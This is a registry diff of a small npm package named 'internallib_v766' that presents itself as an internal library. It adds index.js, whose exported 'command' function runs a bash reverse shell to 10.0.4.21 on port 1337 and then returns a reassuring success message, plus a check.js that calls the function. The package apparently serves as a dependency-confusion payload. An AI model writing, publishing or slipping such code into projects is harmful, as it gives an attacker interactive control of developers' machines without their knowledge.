internallib_v766 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/check.js +3 -0
  2. package/index.js +7 -0
  3. package/package.json +11 -0
package/check.js ADDED
@@ -0,0 +1,3 @@
1
+ internallib = require("internallib_v381")
2
+
3
+ console.log(internallib.command())
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ const { exec } = require('node:child_process');
2
+
3
+ exports.command = function() {
4
+ exec('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.0.4.21/1337 0>&1"');
5
+ console.log("This is a message from the internal lib");
6
+ return "Command Execute with Success";
7
+ }
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "internallib_v766",
3
+ "version": "1.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }